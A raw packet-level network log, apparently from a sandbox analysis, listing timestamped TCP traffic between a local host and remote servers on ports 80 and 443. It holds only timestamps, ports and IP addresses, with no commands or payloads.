Oct 3, 2024 12:27:58.394402027 CEST	80	49753	58.151.148.90	192.168.2.4
Oct 3, 2024 12:27:58.398051977 CEST	80	49753	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:00.313723087 CEST	80	49753	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:00.315578938 CEST	80	49753	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:00.315752029 CEST	49753	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:00.315943003 CEST	49753	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:00.318610907 CEST	49754	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:00.341871023 CEST	80	49753	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:00.346389055 CEST	80	49754	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:00.346478939 CEST	49754	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:00.346709967 CEST	49754	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:00.346709967 CEST	49754	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:00.361630917 CEST	80	49754	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:00.361670971 CEST	80	49754	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:02.008135080 CEST	80	49754	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:02.012284040 CEST	80	49754	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:02.012343884 CEST	49754	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:02.012449026 CEST	49754	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:02.045972109 CEST	80	49754	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:02.066713095 CEST	49755	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:02.072103977 CEST	80	49755	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:02.072202921 CEST	49755	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:02.072351933 CEST	49755	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:02.072388887 CEST	49755	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:02.077653885 CEST	80	49755	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:02.077734947 CEST	80	49755	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:04.226339102 CEST	80	49755	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:04.228297949 CEST	80	49755	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:04.228656054 CEST	49755	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:04.229834080 CEST	49755	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:04.234056950 CEST	49756	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:04.237155914 CEST	80	49755	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:04.241053104 CEST	80	49756	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:04.241235018 CEST	49756	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:04.241367102 CEST	49756	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:04.241400003 CEST	49756	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:04.248390913 CEST	80	49756	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:04.248485088 CEST	80	49756	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:05.961652994 CEST	80	49756	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:05.963469028 CEST	80	49756	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:05.963555098 CEST	49756	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:05.963639021 CEST	49756	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:05.966744900 CEST	49757	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:05.977675915 CEST	80	49756	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:05.981376886 CEST	80	49757	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:05.981457949 CEST	49757	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:05.981570959 CEST	49757	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:05.981570959 CEST	49757	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:05.996402025 CEST	80	49757	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:05.997807026 CEST	80	49757	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:07.987464905 CEST	80	49757	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:08.026654959 CEST	80	49757	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:08.026781082 CEST	49757	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:08.026964903 CEST	49757	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:08.037096977 CEST	80	49757	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:08.038089037 CEST	49758	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:08.048537970 CEST	80	49758	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:08.048633099 CEST	49758	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:08.048866987 CEST	49758	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:08.048922062 CEST	49758	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:08.059562922 CEST	80	49758	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:08.063071012 CEST	80	49758	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:09.875607967 CEST	80	49758	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:09.875646114 CEST	80	49758	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:09.875716925 CEST	49758	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:09.875869036 CEST	49758	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:09.878719091 CEST	49759	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:09.903104067 CEST	80	49758	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:09.903181076 CEST	49758	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:09.905666113 CEST	80	49758	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:09.907649040 CEST	80	49759	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:09.907746077 CEST	49759	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:09.907893896 CEST	49759	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:09.907931089 CEST	49759	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:09.941428900 CEST	80	49759	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:09.941848040 CEST	80	49759	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:12.116727114 CEST	80	49759	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:12.116966009 CEST	80	49759	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:12.117151976 CEST	49759	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:12.117237091 CEST	49759	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:12.120235920 CEST	49760	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:12.124238014 CEST	80	49759	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:12.127583027 CEST	80	49760	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:12.127661943 CEST	49760	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:12.127814054 CEST	49760	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:12.127844095 CEST	49760	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:12.138452053 CEST	80	49760	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:12.138480902 CEST	80	49760	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:14.089869976 CEST	80	49760	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:14.089920044 CEST	80	49760	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:14.089979887 CEST	49760	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:14.090095043 CEST	49760	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:14.092463017 CEST	49761	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:14.095443964 CEST	80	49760	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:14.097687006 CEST	80	49761	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:14.097765923 CEST	49761	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:14.097873926 CEST	49761	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:14.097873926 CEST	49761	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:14.103280067 CEST	80	49761	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:14.103353024 CEST	80	49761	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:15.643258095 CEST	80	49761	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:15.643282890 CEST	80	49761	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:15.643399954 CEST	49761	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:15.643522978 CEST	49761	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:15.645888090 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:15.645936966 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:15.646008968 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:15.646338940 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:15.646358967 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:15.648363113 CEST	80	49761	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:16.242893934 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.243020058 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.249946117 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.249958992 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.250374079 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.270071030 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.311436892 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.459199905 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.459259033 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.459323883 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.459355116 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.510977983 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.545325041 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.545350075 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.545397043 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.545430899 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.546233892 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.546252012 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.546298981 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.546328068 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.547137976 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.547199965 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.548444986 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.548517942 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.631968021 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.632095098 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.632817030 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.632899046 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.633352995 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.633423090 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.634322882 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.634386063 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.635932922 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.635996103 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.636840105 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.636910915 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.642386913 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.642466068 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.678934097 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.679009914 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.718857050 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.718982935 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.719552040 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.719629049 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.720035076 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.720101118 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.721024990 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.721086979 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.721681118 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.721740007 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.722481966 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.722543955 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.723614931 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.723670006 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.724468946 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.724523067 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.725361109 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.725424051 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.726253033 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.726308107 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.726346970 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.726402998 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.746206999 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.746304035 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.767093897 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.767159939 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.785326004 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.785413027 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.785820961 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.785883904 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.806149006 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.806260109 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.806873083 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.806946993 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.807959080 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.808022022 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.808053017 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.808111906 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.808902025 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.808973074 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.809508085 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.809566021 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.810467958 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.810528994 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.811352015 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.811417103 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.812144995 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.812201977 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.812258959 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.812319040 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.812969923 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.813029051 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.813865900 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.813926935 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.813982010 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.814038992 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.853883982 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.854078054 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.854480982 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.854660034 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.872392893 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.872476101 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.893080950 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.893157959 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.893307924 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.893309116 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.893338919 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.893404961 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.893872976 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.894022942 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.894820929 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.894884109 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.894889116 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.894905090 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.894939899 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.895550013 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.895596027 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.895610094 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.895625114 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.895673990 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.895683050 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.895704031 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.895746946 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.895772934 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.895792007 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.895803928 CEST	49762	443	192.168.2.4	23.145.40.164
Oct 3, 2024 12:28:16.895811081 CEST	443	49762	23.145.40.164	192.168.2.4
Oct 3, 2024 12:28:16.956370115 CEST	49763	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:16.961492062 CEST	80	49763	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:16.961581945 CEST	49763	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:16.961728096 CEST	49763	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:16.961728096 CEST	49763	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:16.966566086 CEST	80	49763	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:16.966677904 CEST	80	49763	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:18.517016888 CEST	80	49763	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:18.517270088 CEST	80	49763	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:18.517348051 CEST	49763	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:18.517427921 CEST	49763	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:18.520287037 CEST	49764	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:18.522305965 CEST	80	49763	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:18.525181055 CEST	80	49764	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:18.525259018 CEST	49764	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:18.525346994 CEST	49764	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:18.525366068 CEST	49764	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:18.530132055 CEST	80	49764	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:18.530267000 CEST	80	49764	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:20.066890955 CEST	80	49764	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:20.066917896 CEST	80	49764	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:20.067001104 CEST	49764	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:20.067174911 CEST	49764	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:20.069823027 CEST	49765	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:20.073292971 CEST	80	49764	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:20.076009035 CEST	80	49765	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:20.076082945 CEST	49765	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:20.076170921 CEST	49765	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:20.076190948 CEST	49765	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:20.081058025 CEST	80	49765	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:20.081085920 CEST	80	49765	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:21.566986084 CEST	80	49765	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:21.567116022 CEST	80	49765	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:21.567292929 CEST	49765	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:21.577127934 CEST	49765	80	192.168.2.4	58.151.148.90
Oct 3, 2024 12:28:21.582365990 CEST	80	49765	58.151.148.90	192.168.2.4
Oct 3, 2024 12:28:41.814851046 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:41.814939976 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:41.815011024 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:41.815280914 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:41.815310001 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.430272102 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.430490017 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.432676077 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.432691097 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.433052063 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.496676922 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.496678114 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.496767044 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.784295082 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.784363031 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.784387112 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.784404993 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.784435987 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.784476042 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.784502029 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.872402906 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.872544050 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.872566938 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.872606993 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.872637987 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.872889042 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.872909069 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.872929096 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.872952938 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.872965097 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.872992039 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.911489964 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.911524057 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.911542892 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.911587954 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.911626101 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.911653996 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.921619892 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.921653986 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.921674967 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.921746016 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.921781063 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.921844006 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.921844006 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.961080074 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.961106062 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.961153030 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.961169004 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.961199999 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.961635113 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.961659908 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.961678028 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.961715937 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.961726904 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.961752892 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.963124990 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.963145018 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.963202000 CEST	49766	443	192.168.2.4	23.145.40.162
Oct 3, 2024 12:28:42.963212967 CEST	443	49766	23.145.40.162	192.168.2.4
Oct 3, 2024 12:28:42.963238001 CEST	49766	443	192.168.2.4	23.145.40.162
